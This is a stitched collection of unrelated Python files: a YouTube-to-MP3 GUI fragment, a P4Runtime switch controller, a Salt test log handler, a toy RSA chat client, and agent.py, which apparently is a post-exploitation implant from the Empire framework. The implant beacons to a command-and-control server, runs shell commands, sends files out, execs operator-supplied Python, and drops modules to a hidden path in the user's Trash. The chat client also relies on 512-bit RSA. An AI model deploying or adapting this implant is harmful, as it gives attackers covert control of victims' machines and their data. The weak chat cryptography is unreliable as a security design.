youtube_dl.download(YT_link)
except Exception as ex:
print(ex)
self.Label_avancement.config(
text="convertion finished, file is now in MP3_file folder"
)
self.Label_music_name.config(text="")
self.youtube_url_Entry.config(state=NORMAL)
self.youtube_url_Entry.delete(0, END)
self.bouton_start_convert.config(state=NORMAL)
|
controller.py
|
#!/usr/bin/env python2
# Copyright 2018-present University of Tuebingen, Chair of Communication Networks
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#
# Marco Haeberle (marco.haeberle@uni-tuebingen.de)
# Joshua Hartmann
#
#
import grpc
from concurrent import futures
import time
import sys
import threading
import argparse
import cli
import switch_controller
import topo_client
import control_server
import control_pb2, control_pb2_grpc
# define some variables
ca_path = '../tools/certstrap/out/p4sec-ca.crt'
cert_path = '../tools/certstrap/out/localhost.crt'
key_path = '../tools/certstrap/out/localhost.key'
def start_control_server(switch_controller, listen_addr):
# create a gRPC server
server = grpc.server(futures.ThreadPoolExecutor(max_workers=10))
control_pb2_grpc.add_ControlServicer_to_server(control_server.ControlServer(switch_controller), server)
# prepare tls creds
try:
with open(ca_path, 'rb') as ca_file:
ca = ca_file.read()
except IOError as e:
#print(e)
sys.exit("Error opening CA file")
try:
with open(cert_path, 'rb') as cert_file:
cert = cert_file.read()
except IOError as e:
#print(e)
sys.exit("Error opening cert file")
try:
with open(key_path, 'rb') as key_file:
key = key_file.read()
except IOError as e:
#print(e)
sys.exit("Error opening key file")
server_creds = grpc.ssl_server_credentials([(key, cert)], ca, True)
# listen on port 50051
#print('Starting gRPC server. Listening on ' + listen_addr)
server.add_secure_port(listen_addr, server_creds)
server.start()
# server.start() does not block -> sleep-loop to keep the server alive
while True:
time.sleep(100)
def start_cli(ctrl):
print('starting cli')
cmd = cli.CLI()
cmd.set_controller(ctrl)
cmd.cmdloop()
ctrl.teardown()
parser = argparse.ArgumentParser(description='P4Runtime Controller')
parser.add_argument('--p4info', help='p4info proto in text format from p4c', type=str, action="store", required=False,
default='../p4/p4/build/basic.p4info')
parser.add_argument('--bmv2-json', help='BMv2 JSON file from p4c', type=str, action="store", required=False,
default='../p4/p4/build/basic.json')
parser.add_argument('-a', help='P4Runtime address', type=str, action="store", required=False,
default='127.0.0.1:50051')
parser.add_argument('-s', help='nanomsg socket for notifications from simple_switch', type=str, action="store", required=False,
default='ipc:///tmp/bmv2-0-notifications.ipc')
parser.add_argument('-n', help='name of the switch (needs to be unique)', type=str, action="store", required=False,
default='s0')
parser.add_argument('-d', help='device id of the switch', type=str, action="store", required=False,
default='0')
parser.add_argument('--num-ports', help='number of ports excluding CPU port', type=str, action="store", required=False,
default='15')
parser.add_argument('-c', help='address of the central controller', type=str, action="store", required=False,
default='localhost:51001')
parser.add_argument('-l', help='listen address for control server', type=str, action="store", required=False,
default='localhost:52001')
parser.add_argument('-m', help='mac address of the switch', type=str, action="store", required=False,
default='62:88:00:00:00:01')
args = parser.parse_args()
switch_name = args.n
switch_ip = args.a
notification_socket = args.s
device_id = int(args.d)
num_ports = args.num_ports
controller_address = args.c
listen_address = args.l
mac_address = args.m
# grpc client for communication wiht central controller
topo_client = topo_client.TopoClient(controller_address)
# global ctrl
ctrl = switch_controller.SwitchController(args.p4info, args.bmv2_json, topo_client, mac_address)
# grpc server for communication with central controller
control_server_t = threading.Thread(target=start_control_server, args=(ctrl, listen_address))
control_server_t.daemon = True
control_server_t.start()
## BMV2 switches
ctrl.add_switch_connection(switch_name,
address=switch_ip,
device_id=device_id,
debug = False,
type = 'bmv2',
notification_socket = notification_socket,
num_ports = num_ports)
ctrl.startup()
topo_client.registerController(listen_address, switch_name, mac_address)
# cli
cli_t = threading.Thread(target=start_cli, args=(ctrl,))
cli_t.daemon = True
cli_t.start()
# exit when CTRL-C ist pressed or when the CLI is stopped by entering 'exit'
try:
while cli_t.is_alive():
time.sleep(1)
topo_client.updateTopo(switch_name, {})
except KeyboardInterrupt:
print('shutting down')
topo_client.updateTopo(switch_name, {})
sys.exit(0)
|
pytest_log_handler.py
|
"""
pytest_log_handler
~~~~~~~~~~~~~~~~~~
Salt External Logging Handler
"""
import atexit
import copy
import logging
import os
import pprint
import socket
import sys
import threading
import traceback
try:
from salt.utils.stringutils import to_unicode
except ImportError:
# This likely due to running backwards compatibility tests against older minions
from salt.utils import to_unicode
try:
from salt._logging.impl import LOG_LEVELS
from salt._logging.mixins import ExcInfoOnLogLevelFormatMixin
except ImportError:
# This likely due to running backwards compatibility tests against older minions
from salt.log.setup import LOG_LEVELS
from salt.log.mixins import ExcInfoOnLogLevelFormatMixIn as ExcInfoOnLogLevelFormatMixin
try:
from salt._logging.mixins import NewStyleClassMixin
except ImportError:
try:
# This likely due to running backwards compatibility tests against older minions
from salt.log.mixins import NewStyleClassMixIn as NewStyleClassMixin
except ImportError:
# NewStyleClassMixin was removed from salt
class NewStyleClassMixin(object):
"""
A copy of Salt's previous NewStyleClassMixin implementation
"""
try:
import msgpack
HAS_MSGPACK = True
except ImportError:
HAS_MSGPACK = False
try:
import zmq
HAS_ZMQ = True
except ImportError:
HAS_ZMQ = False
__virtualname__ = "pytest_log_handler"
log = logging.getLogger(__name__)
def __virtual__():
role = __opts__["__role"]
pytest_key = "pytest-{}".format(role)
pytest_config = __opts__[pytest_key]
if "log" not in pytest_config:
return False, "No 'log' key in opts {} dictionary".format(pytest_key)
log_opts = pytest_config["log"]
if "port" not in log_opts:
return (
False,
"No 'port' key in opts['pytest']['log'] or opts['pytest'][{}]['log']".format(
__opts__["role"]
),
)
if HAS_MSGPACK is False:
return False, "msgpack was not importable. Please install msgpack."
if HAS_ZMQ is False:
return False, "zmq was not importable. Please install pyzmq."
return True
def setup_handlers():
role = __opts__["__role"]
pytest_key = "pytest-{}".format(role)
pytest_config = __opts__[pytest_key]
log_opts = pytest_config["log"]
host_addr = log_opts.get("host")
if not host_addr:
import subprocess
if log_opts["pytest_windows_guest"] is True:
proc = subprocess.Popen("ipconfig", stdout=subprocess.PIPE)
for line in proc.stdout.read().strip().encode(__salt_system_encoding__).splitlines():
if "Default Gateway" in line:
parts = line.split()
host_addr = parts[-1]
break
else:
proc = subprocess.Popen(
"netstat -rn | grep -E '^0.0.0.0|default' | awk '{ print $2 }'",
shell=True,
stdout=subprocess.PIPE,
)
host_addr = proc.stdout.read().strip().encode(__salt_system_encoding__)
host_port = log_opts["port"]
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect((host_addr, host_port))
except OSError as exc:
# Don't even bother if we can't connect
log.warning("Cannot connect back to log server at %s:%d: %s", host_addr, host_port, exc)
return
finally:
sock.close()
pytest_log_prefix = log_opts.get("prefix")
try:
level = LOG_LEVELS[(log_opts.get("level") or "error").lower()]
except KeyError:
level = logging.ERROR
handler = ZMQHandler(host=host_addr, port=host_port, log_prefix=pytest_log_prefix, level=level)
handler.setLevel(level)
handler.start()
return handler
class ZMQHandler(ExcInfoOnLogLevelFormatMixin, logging.Handler, NewStyleClassMixin):
# We offload sending the log records to the consumer to a separate
# thread because PUSH socket's WILL block if the receiving end can't
# receive fast enough, thus, also blocking the main thread.
#
# To achieve this, we create an inproc zmq.PAIR, which also guarantees
# message delivery, but should be way faster than the PUSH.
# We also set some high enough high water mark values to cope with the
# message flooding.
#
# We also implement a start method which is deferred until sending the
# first message because, logging handlers, on platforms which support
# forking, are inherited by forked processes, and we don't want the ZMQ
# machinery inherited.
# For the cases where the ZMQ machinery is still inherited because a
# process was forked after ZMQ has been prepped up, we check the handler's
# pid attribute against, the current process pid. If it's not a match, we
# reconnect the ZMQ machinery.
def __init__(self, host="127.0.0.1", port=3330, log_prefix=None, level=logging.NOTSET):
super(ZMQHandler, self).__init__(level=level)
self.pid = os.getpid()
self.push_address = "tcp://{}:{}".format(host, port)
self.log_prefix = self._get_log_prefix(log_prefix)
self.context = self.proxy_address = self.in_proxy = self.proxy_thread = None
self._exiting = False
def _get_log_prefix(self, log_prefix):
if log_prefix is None:
return
if sys.argv[0] == sys.executable:
cli_arg_idx = 1
else:
cli_arg_idx = 0
cli_name = os.path.basename(sys.argv[cli_arg_idx])
return log_prefix.format(cli_name=cli_name)
def start(self):
if self.pid != os.getpid():
self.stop()
self._exiting = False
if self._exiting is True:
return
if self.in_proxy is not None:
return
atexit.register(self.stop)
context = in_proxy = None
try:
context = zmq.Context()
self.context = context
except zmq.ZMQError as exc:
sys.stderr.write(
"Failed to create the ZMQ Context: {}\n{}\n".format(exc, traceback.format_exc(exc))
)
sys.stderr.flush()
# Let's start the proxy thread
socket_bind_event = threading.Event()
self.proxy_thread = threading.Thread(
target=self._proxy_logs_target, args=(socket_bind_event,)
)
self.proxy_thread.daemon = True
self.proxy_thread.start()
# Now that we discovered which random port to use, let's continue with the setup
if socket_bind_event.wait(5) is not True:
sys.stderr.write("Failed to bind the ZMQ socket PAIR\n")
sys.stderr.flush()
context.term()
return
# And we can now also connect the messages input side of the proxy
try:
in_proxy = self.context.socket(zmq.PAIR)
in_proxy.set_hwm(100000)
in_proxy.connect(self.proxy_address)
self.in_proxy = in_proxy
except zmq.ZMQError as exc:
if in_proxy is not None:
in_proxy.close(1000)
sys.stderr.write(
"Failed to bind the ZMQ PAIR socket: {}\n{}\n".format(
exc, traceback.format_exc(exc)
)
)
sys.stderr.flush()
def stop(self):
if self._exiting:
return
self._exiting = True
try:
atexit.unregister(self.stop)
except AttributeError:
# Python 2
try:
atexit._exithandlers.remove((self.stop, (), {}))
except ValueError:
# The exit handler isn't registered
pass
try:
if self.in_proxy is not None:
self.in_proxy.send(msgpack.dumps(None))
self.in_proxy.close(1500)
if self.context is not None:
self.context.term()
if self.proxy_thread is not None and self.proxy_thread.is_alive():
self.proxy_thread.join(5)
except Exception as exc: # pragma: no cover pylint: disable=broad-except
sys.stderr.write(
"Failed to terminate ZMQHandler: {}\n{}\n".format(exc, traceback.format_exc(exc))
)
sys.stderr.flush()
raise
finally:
self.context = self.in_proxy = self.proxy_address = self.proxy_thread = None
def format(self, record):
msg = super(ZMQHandler, self).format(record)
if self.log_prefix:
msg = "[{}] {}".format(to_unicode(self.log_prefix), to_unicode(msg))
return msg
def prepare(self, record):
msg = self.format(record)
record = copy.copy(record)
record.msg = msg
# Reduce network bandwidth, we don't need these any more
record.args = None
record.exc_info = None
record.exc_text = None
record.message = None # redundant with msg
# On Python >= 3.5 we also have stack_info, but we've formatted already so, reset it
record.stack_info = None
try:
return msgpack.dumps(record.__dict__, use_bin_type=True)
except TypeError as exc:
# Failed to serialize something with msgpack
logging.getLogger(__name__).error(
"Failed to serialize log record: %s.\n%s", exc, pprint.pformat(record.__dict__)
)
self.handleError(record)
def emit(self, record):
"""
Emit a record.
Writes the LogRecord to the queue, preparing it for pickling first.
"""
# Python's logging machinery acquires a lock before calling this method
# that's why it's safe to call the start method without an explicit acquire
if self._exiting:
return
self.start()
if self.in_proxy is None:
sys.stderr.write(
"Not sending log message over the wire because "
"we were unable to properly configure a ZMQ PAIR socket.\n"
)
sys.stderr.flush()
return
try:
msg = self.prepare(record)
self.in_proxy.send(msg)
except SystemExit:
pass
except Exception: # pragma: no cover pylint: disable=broad-except
self.handleError(record)
def _proxy_logs_target(self, socket_bind_event):
context = zmq.Context()
out_proxy = pusher = None
try:
out_proxy = context.socket(zmq.PAIR)
out_proxy.set_hwm(100000)
proxy_port = out_proxy.bind_to_random_port("tcp://127.0.0.1")
self.proxy_address = "tcp://127.0.0.1:{}".format(proxy_port)
except zmq.ZMQError as exc:
if out_proxy is not None:
out_proxy.close(1000)
context.term()
sys.stderr.write(
"Failed to bind the ZMQ PAIR socket: {}\n{}\n".format(
exc, traceback.format_exc(exc)
)
)
sys.stderr.flush()
return
try:
pusher = context.socket(zmq.PUSH)
pusher.set_hwm(100000)
pusher.connect(self.push_address)
except zmq.ZMQError as exc:
if pusher is not None:
pusher.close(1000)
context.term()
sys.stderr.write(
"Failed to connect the ZMQ PUSH socket: {}\n{}\n".format(
exc, traceback.format_exc(exc)
)
)
sys.stderr.flush()
socket_bind_event.set()
sentinel = msgpack.dumps(None)
while True:
try:
msg = out_proxy.recv()
if msg == sentinel:
# Received sentinel to stop
break
pusher.send(msg)
except zmq.ZMQError as exc:
sys.stderr.write(
"Failed to proxy log message: {}\n{}\n".format(exc, traceback.format_exc(exc))
)
sys.stderr.flush()
break
# Close the receiving end of the PAIR proxy socket
out_proxy.close(0)
# Allow, the pusher queue to send any messages in it's queue for
# the next 1.5 seconds
pusher.close(1500)
context.term()
|
client.py
|
import requests
import rsa
import pickle
import base64
from threading import Thread
import time
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKCYAN = '\033[96m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
url = "http://2422-129-97-124-0.ngrok.io/"
def generate_rsa_key():
publicKey, privateKey = rsa.newkeys(512)
return publicKey, privateKey
def encrypt_message(publicKey, message):
encMessage = rsa.encrypt(message.encode(),publicKey)
return encMessage
def decrypt_message(privateKey, message):
decMessage = rsa.decrypt(message, privateKey).decode()
return decMessage
def generate_keys(username_own):
public,private = generate_rsa_key()
f = open("self_keys.dat","wb")
d = {
"public_own" : public,
"private_own" : private,
"chat_id" : 0
}
pickle.dump(d,f)
f.close()
data = {
"username": username_own,
"public_n": public.n,
"public_e":public.e}
response = requests.post(url+"/send_public_key", json= data)
def check_exist():
try:
f = open("self_keys.dat", "rb")
f.close()
return True
except:
return False
def send_message(to_username,from_username):
message = input("Enter Your Message : ")
f = open("user_keys.dat", "rb+")
while True:
data = pickle.load(f)
if data["username_target"] == to_username:
public_key = data["public_key"]
break
a = encrypt_message(public_key, message)
enc_message = base64.b64encode(a)
data = {
"username":to_username,
"message":enc_message.decode("utf-8"),
"from_username":from_username
}
response = requests.post(url,json = data)
def __init__():
username_target = input("Enter Username Of Your Friend : ")
if check_exist():
if have_key(username_target):
while True:
send_message(username_target, username_own)
else:
ask_key(username_target)
while True:
send_message(username_target, username_own)
else:
generate_keys(username_own)
__init__()
def have_key(username_target):
try:
f = open("user_keys.dat","rb")
while True:
data=pickle.load(f)
if data["username"] == username_target:
return True
f.close()
except:
return False
def ask_key(username_target):
response = requests.get(url+"/ask_key",params={"username":username_target})
data = response.json()
public_n = data["public_n"]
public_e = data["public_e"]
f = open("user_keys.dat","ab")
d = {
"username_target" : username_target,
"public_key":rsa.PublicKey(public_n, public_e)
}
pickle.dump(d,f)
f.close()
def receive_message(username_own):
f = open("self_keys.dat", "rb+")
data = pickle.load(f)
public_own = data["public_own"]
private_own = data["private_own"]
last_chat_id = data["chat_id"]
f.close()
response = requests.get(url+"/check_message",params={"username":username_own,"last_chat_id":
last_chat_id})
try:
data = response.json()
messages = data["message"]
users = data["username"]
chat_id = data["chat_id"]
a = zip(messages,users,chat_id)
for message,user,chat in a:
message = base64.b64decode(message.encode("utf-8"))
message = decrypt_message(private_own,message)
print("\n"+bcolors.FAIL + user + " : " + message + bcolors.ENDC)
last_chat_id = chat
except:
pass
f = open("self_keys.dat","wb")
d = {
"public_own" : public_own,
"private_own" : private_own,
"chat_id" : last_chat_id
}
pickle.dump(d,f)
f.close()
def loop():
while True:
receive_message(username_own)
time.sleep(1)
def create_bg_thread():
t1 = Thread(target = loop)
t2 = Thread(target = __init__)
t1.setDaemon(True)
t2.setDaemon(True)
t1.start()
t2.start()
def begin_texting():
a = input("Are you a new user (y/n) : ")
global username_own
username_own = input("Enter You Username : ")
if (a == "y"):
generate_keys(username_own)
create_bg_thread()
while True:
pass
else:
create_bg_thread()
while True:
pass
begin_texting()
#create_bg_thread()
#__init__()
#receive_message("shahrukh")
|
agent.py
|
import __future__
import zipfile
import io
from urllib import urlopen
import struct, time, base64, subprocess, random, time, datetime
from os.path import expanduser
from StringIO import StringIO
from threading import Thread
import os
import sys
import trace
import shlex
import zlib
import threading
import BaseHTTPServer
import zipfile
import imp
################################################
#
# agent configuration information
#
################################################
# print "starting agent"
# profile format ->
# tasking uris | user agent | additional header 1 | additional header 2 | ...
profile = "/admin/get.php,/news.asp,/login/process.jsp|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
if server.endswith("/"): server = server[0:-1]
delay = 60
jitter = 0.0
lostLimit = 60
missedCheckins = 0
jobMessageBuffer = ""
# killDate form -> "MO/DAY/YEAR"
killDate = ""
# workingHours form -> "9:00-17:00"
workingHours = ""
parts = profile.split("|")
taskURIs = parts[0].split(",")
userAgent = parts[1]
headersRaw = parts[2:]
defaultPage = base64.b64decode("")
_meta_cache = {}
moduleRepo = {}
jobs = []
global t
# global header dictionary
# sessionID is set by stager.py
headers = {'User-Agent': userAgent, "Cookie": "SESSIONID=%s" %(sessionID)}
# parse the headers into the global header dictionary
for headerRaw in headersRaw:
try:
headerKey = headerRaw.split(":")[0]
headerValue = headerRaw.split(":")[1]
if headerKey.lower() == "cookie":
headers['Cookie'] = "%s;%s" %(headers['Cookie'], headerValue)
else:
headers[headerKey] = headerValue
except:
pass
################################################
#
# communication methods
#
################################################
def sendMessage(packets=None):
"""
Requests a tasking or posts data to a randomized tasking URI.
If packets == None, the agent GETs a tasking from the control server.
If packets != None, the agent encrypts the passed packets and
POSTs the data to the control server.
"""
global missedCheckins
global server
global headers
global taskURIs
data = None
if packets:
data = "".join(packets)
data = aes_encrypt_then_hmac(key, data)
taskURI = random.sample(taskURIs, 1)[0]
if (server.endswith(".php")):
# if we have a redirector host already
requestUri = server
else:
requestUri = server + taskURI
try:
data = (urllib2.urlopen(urllib2.Request(requestUri, data, headers))).read()
return ("200", data)
except urllib2.HTTPError as HTTPError:
# if the server is reached, but returns an erro (like 404)
missedCheckins = missedCheckins + 1
return (HTTPError.code, "")
except urllib2.URLError as URLerror:
# if the server cannot be reached
missedCheckins = missedCheckins + 1
return (URLerror.reason, "")
return ("","")
################################################
#
# encryption methods
#
################################################
def encodePacket(taskingID, packetData):
"""
Encode a response packet.
[4 bytes] - type
[4 bytes] - counter
[4 bytes] - length
[X...] - tasking data
"""
# packetData = packetData.encode('utf-8').strip()
taskID = struct.pack('=L', taskingID)
counter = struct.pack('=L', 0)
if(packetData):
length = struct.pack('=L',len(packetData))
else:
length = struct.pack('=L',0)
# b64data = base64.b64encode(packetData)
if(packetData):
packetData = packetData.decode('ascii', 'ignore').encode('ascii')
return taskID + counter + length + packetData
def decodePacket(packet, offset=0):
"""
Parse a tasking packet, returning (PACKET_TYPE, counter, length, data, REMAINING_PACKETES)
[4 bytes] - type
[4 bytes] - counter
[4 bytes] - length
[X...] - tasking data
[Y...] - remainingData (possibly nested packet)
"""
try:
responseID = struct.unpack('=L', packet[0+offset:4+offset])[0]
counter = struct.unpack('=L', packet[4+offset:8+offset])[0]
length = struct.unpack('=L', packet[8+offset:12+offset])[0]
# data = base64.b64decode(packet[12+offset:12+offset+length])
data = packet[12+offset:12+offset+length]
remainingData = packet[12+offset+length:]
return (responseID, counter, length, data, remainingData)
except Exception as e:
print "decodePacket exception:",e
return (None, None, None, None, None)
def processTasking(data):
# processes an encrypted data packet
# -decrypts/verifies the response to get
# -extracts the packets and processes each
try:
tasking = aes_decrypt_and_verify(key, data)
(taskingID, counter, length, data, remainingData) = decodePacket(tasking)
# if we get to this point, we have a legit tasking so reset missedCheckins
missedCheckins = 0
# execute/process the packets and get any response
resultPackets = ""
result = processPacket(taskingID, data)
if result:
resultPackets += result
packetOffset = 12 + length
while remainingData and remainingData != "":
(taskingID, counter, length, data, remainingData) = decodePacket(tasking, offset=packetOffset)
result = processPacket(taskingID, data)
if result:
resultPackets += result
packetOffset += 12 + length
sendMessage(resultPackets)
except Exception as e:
print "processTasking exception:",e
pass
def processJobTasking(result):
# process job data packets
# - returns to the C2
# execute/process the packets and get any response
try:
resultPackets = ""
if result:
resultPackets += result
# send packets
sendMessage(resultPackets)
except Exception as e:
print "processJobTasking exception:",e
pass
def processPacket(taskingID, data):
try:
taskingID = int(taskingID)
except Exception as e:
return None
if taskingID == 1:
# sysinfo request
# get_sysinfo should be exposed from stager.py
return encodePacket(1, get_sysinfo())
elif taskingID == 2:
# agent exit
msg = "[!] Agent %s exiting" %(sessionID)
sendMessage(encodePacket(2, msg))
agent_exit()
elif taskingID == 40:
# run a command
resultData = str(run_command(data))
return encodePacket(40, resultData)
elif taskingID == 41:
# file download
filePath = os.path.abspath(data)
if not os.path.exists(filePath):
return encodePacket(40, "file does not exist or cannot be accessed")
offset = 0
size = os.path.getsize(filePath)
partIndex = 0
while True:
# get 512kb of the given file starting at the specified offset
encodedPart = get_file_part(filePath, offset=offset, base64=False)
c = compress()
start_crc32 = c.crc32_data(encodedPart)
comp_data = c.comp_data(encodedPart)
encodedPart = c.build_header(comp_data, start_crc32)
encodedPart = base64.b64encode(encodedPart)
partData = "%s|%s|%s" %(partIndex, filePath, encodedPart)
if not encodedPart or encodedPart == '' or len(encodedPart) == 16:
break
sendMessage(encodePacket(41, partData))
global delay
global jitter
if jitter < 0: jitter = -jitter
if jitter > 1: jitter = 1/jitter
minSleep = int((1.0-jitter)*delay)
maxSleep = int((1.0+jitter)*delay)
sleepTime = random.randint(minSleep, maxSleep)
time.sleep(sleepTime)
partIndex += 1
offset += 5120000
elif taskingID == 42:
# file upload
try:
parts = data.split("|")
filePath = parts[0]
base64part = parts[1]
raw = base64.b64decode(base64part)
d = decompress()
dec_data = d.dec_data(raw, cheader=True)
if not dec_data['crc32_check']:
sendMessage(encodePacket(0, "[!] WARNING: File upload failed crc32 check during decompressing!."))
sendMessage(encodePacket(0, "[!] HEADER: Start crc32: %s -- Received crc32: %s -- Crc32 pass: %s!." %(dec_data['header_crc32'],dec_data['dec_crc32'],dec_data['crc32_check'])))
f = open(filePath, 'ab')
f.write(dec_data['data'])
f.close()
sendMessage(encodePacket(42, "[*] Upload of %s successful" %(filePath) ))
except Exception as e:
sendec_datadMessage(encodePacket(0, "[!] Error in writing file %s during upload: %s" %(filePath, str(e)) ))
elif taskingID == 50:
# return the currently running jobs
msg = ""
if len(jobs) == 0:
msg = "No active jobs"
else:
msg = "Active jobs:\n"
for x in xrange(len(jobs)):
msg += "\t%s" %(x)
return encodePacket(50, msg)
elif taskingID == 51:
# stop and remove a specified job if it's running
try:
# Calling join first seems to hang
# result = jobs[int(data)].join()
sendMessage(encodePacket(0, "[*] Attempting to stop job thread"))
result = jobs[int(data)].kill()
sendMessage(encodePacket(0, "[*] Job thread stoped!"))
jobs[int(data)]._Thread__stop()
jobs.pop(int(data))
if result and result != "":
sendMessage(encodePacket(51, result))
except:
return encodePacket(0, "error stopping job: %s" %(data))
elif taskingID == 100:
# dynamic code execution, wait for output, don't save outputPicl
try:
buffer = StringIO()
sys.stdout = buffer
code_obj = compile(data, '<string>', 'exec')
exec code_obj in globals()
sys.stdout = sys.__stdout__
results = buffer.getvalue()
return encodePacket(100, str(results))
except Exception as e:
errorData = str(buffer.getvalue())
return encodePacket(0, "error executing specified Python data: %s \nBuffer data recovered:\n%s" %(e, errorData))
elif taskingID == 101:
# dynamic code execution, wait for output, save output
prefix = data[0:15].strip()
extension = data[15:20].strip()
data = data[20:]
try:
buffer = StringIO()
sys.stdout = buffer
code_obj = compile(data, '<string>', 'exec')
exec code_obj in globals()
sys.stdout = sys.__stdout__
c = compress()
start_crc32 = c.crc32_data(buffer.getvalue())
comp_data = c.comp_data(buffer.getvalue())
encodedPart = c.build_header(comp_data, start_crc32)
encodedPart = base64.b64encode(encodedPart)
return encodePacket(101, '{0: <15}'.format(prefix) + '{0: <5}'.format(extension) + encodedPart )
except Exception as e:
# Also return partial code that has been executed
errorData = str(buffer.getvalue())
return encodePacket(0, "error executing specified Python data %s \nBuffer data recovered:\n%s" %(e, errorData))
elif taskingID == 102:
# on disk code execution for modules that require multiprocessing not supported by exec
try:
implantHome = expanduser("~") + '/.Trash/'
moduleName = ".mac-debug-data"
implantPath = implantHome + moduleName
result = "[*] Module disk path: %s \n" %(implantPath)
with open(implantPath, 'w') as f:
f.write(data)
result += "[*] Module properly dropped to disk \n"
pythonCommand = "python %s" %(implantPath)
process = subprocess.Popen(pythonCommand, stdout=subprocess.PIPE, shell=True)
data = process.communicate()
result += data[0].strip()
try:
os.remove(implantPath)
result += "\n[*] Module path was properly removed: %s" %(implantPath)
except Exception as e:
print "error removing module filed: %s" %(e)
fileCheck = os.path.isfile(implantPath)
if fileCheck:
result += "\n\nError removing module file, please verify path: " + str(implantPath)
return encodePacket(100, str(result))
except Exception as e:
fileCheck = os.path.isfile(implantPath)
if fileCheck:
return encodePacket(0, "error executing specified Python data: %s \nError removing module file, please verify path: %s" %(e, implantPath))
return encodePacket(0, "error executing specified Python data: %s" %(e))
elif taskingID == 110:
start_job(data)
return encodePacket(110, "job %s started" %(len(jobs)-1))
elif taskingID == 111:
# TASK_CMD_JOB_SAVE
# TODO: implement job structure
pass
elif taskingID == 122:
try:
#base64 and decompress the data.
parts = data.split('|')
fileName = parts[0]
base64part = parts[1]
raw = base64.b64decode(base64part)
d = decompress()
dec_data = d.dec_data(raw, cheader=True)
if not dec_data['crc32_check']:
sendMessage(encodePacket(122, "[!] WARNING: Module import failed crc32 check during decompressing!."))
sendMessage(encodePacket(122, "[!] HEADER: Start crc32: %s -- Received crc32: %s -- Crc32 pass: %s!." %(dec_data['header_crc32'],dec_data['dec_crc32'],dec_data['crc32_check'])))
except:
sendec_datadMessage(encodePacket(122, "[!] Error in Importing module %s during upload: %s" %(fileName, str(e)) ))
zf = zipfile.ZipFile(io.BytesIO(dec_data['data']), 'r')
moduleRepo[fileName] = zf
install_hook(fileName)
sendMessage(encodePacket(122, "Import of %s successful" %(fileName)))
elif taskingID == 123:
#Remove a module repo
repoName = data
try:
remove_hook(repoName)
sendMessage(encodePacket(123, "%s repo successfully removed" % (repoName)))
except Exception as e:
sendMessage(encodePacket(123, "Unable to remove repo: %s : %s" % (repoName, str(e))))
elif taskingID == 124:
#List all module repos and their contents
repoName = data
if repoName == "":
loadedModules = "\nAll Repos\n"
for key, value in moduleRepo.items():
loadedModules += "\n----"+key+"----\n"
loadedModules += '\n'.join(moduleRepo[key].namelist())
sendMessage(encodePacket(124, loadedModules))
else:
try:
loadedModules = "\n----"+repoName+"----\n"
loadedModules += '\n'.join(moduleRepo[repoName].namelist())
sendMessage(encodePacket(124, loadedModules))
except Exception as e:
msg = "Unable to retrieve repo contents: %s" % (str(e))
sendMessage(encodePacket(124, msg))
else:
return encodePacket(0, "invalid tasking ID: %s" %(taskingID))
################################################
#
# Custom Zip Importer
#
################################################
#adapted from https://github.com/sulinx/remote_importer
# [0] = .py ext, is_package = False
# [1] = /__init__.py ext, is_package = True
_search_order = [('.py', False), ('/__init__.py', True)]
class ZipImportError(ImportError):
"""Exception raised by zipimporter objects."""
# _get_info() = takes the fullname, then subpackage name (if applicable),
# and searches for the respective module or package
class CFinder(object):
"""Import Hook for Empire"""
def __init__(self, repoName):
self.repoName = repoName
self._source_cache = {}
def _get_info(self, repoName, fullname):
"""Search for the respective package or module in the zipfile object"""
parts = fullname.split('.')
submodule = parts[-1]
modulepath = '/'.join(parts)
#check to see if that specific module exists
for suffix, is_package in _search_order:
relpath = modulepath + suffix
try:
moduleRepo[repoName].getinfo(relpath)
except KeyError:
pass
else:
return submodule, is_package, relpath
#Error out if we can find the module/package
msg = ('Unable to locate module %s in the %s repo' % (submodule, repoName))
raise ZipImportError(msg)
def _get_source(self, repoName, fullname):
"""Get the source code for the requested module"""
submodule, is_package, relpath = self._get_info(repoName, fullname)
fullpath = '%s/%s' % (repoName, relpath)
if relpath in self._source_cache:
source = self._source_cache[relpath]
return submodule, is_package, fullpath, source
try:
source = moduleRepo[repoName].read(relpath)
source = source.replace('\r\n', '\n')
source = source.replace('\r', '\n')
self._source_cache[relpath] = source
return submodule, is_package, fullpath, source
except:
raise ZipImportError("Unable to obtain source for module %s" % (fullpath))
def find_module(self, fullname, path=None):
try:
submodule, is_package, relpath = self._get_info(self.repoName, fullname)
except ImportError:
return None
else:
return self
def load_module(self, fullname):
submodule, is_package, fullpath, source = self._get_source(self.repoName, fullname)
code = compile(source, fullpath, 'exec')
mod = sys.modules.setdefault(fullname, imp.new_module(fullname))
mod.__loader__ = self
mod.__file__ = fullpath
mod.__name__ = fullname
if is_package:
mod.__path__ = [os.path.dirname(mod.__file__)]
exec code in mod.__dict__
return mod
def get_data(self, fullpath):
prefix = os.path.join(self.repoName, '')
if not fullpath.startswith(prefix):
raise IOError('Path %r does not start with module name %r', (fullpath, prefix))
relpath = fullpath[len(prefix):]
try:
return moduleRepo[self.repoName].read(relpath)
except KeyError:
raise IOError('Path %r not found in repo %r' % (relpath, self.repoName))
def is_package(self, fullname):
"""Return if the module is a package"""
submodule, is_package, relpath = self._get_info(self.repoName, fullname)
return is_package
def get_code(self, fullname):
submodule, is_package, fullpath, source = self._get_source(self.repoName, fullname)
return compile(source, fullpath, 'exec')
def install_hook(repoName):
if repoName not in _meta_cache:
finder = CFinder(repoName)
_meta_cache[repoName] = finder
sys.meta_path.append(finder)
def remove_hook(repoName):
if repoName in _meta_cache:
finder = _meta_cache.pop(repoName)
sys.meta_path.remove(finder)
################################################
#
# misc methods
#
################################################
class compress(object):
'''
Base clase for init of the package. This will handle
the initial object creation for conducting basic functions.
'''
CRC_HSIZE = 4
COMP_RATIO = 9
def __init__(self, verbose=False):
"""
Populates init.
"""
pass
